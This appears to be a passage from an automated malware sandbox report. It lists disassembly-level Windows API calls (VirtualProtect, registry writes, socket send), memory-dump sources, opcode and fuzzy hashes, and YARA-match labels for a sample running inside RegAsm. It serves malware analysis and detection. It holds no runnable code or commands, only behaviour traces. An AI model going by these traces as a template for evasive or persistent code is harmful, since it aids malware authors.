                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModuleProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2905821283-0
                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                          • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                          • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                          APIs
                                                                                                                          • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                          • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: EventObjectSingleWaitsend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3963590051-0
                                                                                                                          • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                          • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                                                                                          • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                          • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual$HandleModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3519776433-0
                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                          • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                          • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                          • RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3677997916-0
                                                                                                                          • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                          • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                                                          • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                          • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                          • RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3677997916-0
                                                                                                                          • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                          • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                                                                          • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                          • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                          • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3677997916-0
                                                                                                                          • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                          • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                                                          • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                          • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                                                                                          • RegQueryValueExA.KERNEL32 ref: 00413565
                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 00413570
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3677997916-0
                                                                                                                          • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                          • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                                                          • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                          • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                                                          APIs
                                                                                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                          • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                          • RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1818849710-0
                                                                                                                          • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                          • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                                                          • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                          • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                                                          APIs
                                                                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Info
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1807457897-3916222277
                                                                                                                          • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                          • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                                                                                          • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                          • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                                                                                          APIs
                                                                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Info
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1807457897-3916222277
                                                                                                                          • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                          • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                          • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                          • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcslen
                                                                                                                          • String ID: pQG
                                                                                                                          • API String ID: 176396367-3769108836
                                                                                                                          • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                          • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                                                          • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                          • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                                                          APIs
                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: String
                                                                                                                          • String ID: LCMapStringEx
                                                                                                                          • API String ID: 2568140703-3893581201
                                                                                                                          • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                          • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                                                                                          • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                          • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                                                                                          APIs
                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: String
                                                                                                                          • String ID: LCMapStringEx
                                                                                                                          • API String ID: 2568140703-3893581201
                                                                                                                          • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                          • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                                                          • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                          • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                                                                          APIs
                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                                                                                          Strings
                                                                                                                          • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                                                                          • String ID: InitializeCriticalSectionEx
                                                                                                                          • API String ID: 2593887523-3084827643
                                                                                                                          • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                                          • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                                                                                          • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                                          • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Alloc
                                                                                                                          • String ID: FlsAlloc
                                                                                                                          • API String ID: 2773662609-671089009
                                                                                                                          • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                          • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                                                                                          • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                          • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Alloc
                                                                                                                          • String ID: FlsAlloc
                                                                                                                          • API String ID: 2773662609-671089009
                                                                                                                          • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                          • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                                                          • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                          • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                                                                          APIs
                                                                                                                          • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: try_get_function
                                                                                                                          • String ID: FlsAlloc
                                                                                                                          • API String ID: 2742660187-671089009
                                                                                                                          • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                                          • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                                                                                          • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                                          • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                                                                                          APIs
                                                                                                                          • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: try_get_function
                                                                                                                          • String ID: FlsAlloc
                                                                                                                          • API String ID: 2742660187-671089009
                                                                                                                          • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                          • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                                                                          • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                          • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                                                                          APIs
                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 1890195054-2766056989
                                                                                                                          • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                          • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                                                                          • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                          • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                                                                                          • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 546120528-0
                                                                                                                          • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                          • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                                                                                          • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                          • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                          • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 546120528-0
                                                                                                                          • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                          • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                          • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                          • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                                                          APIs
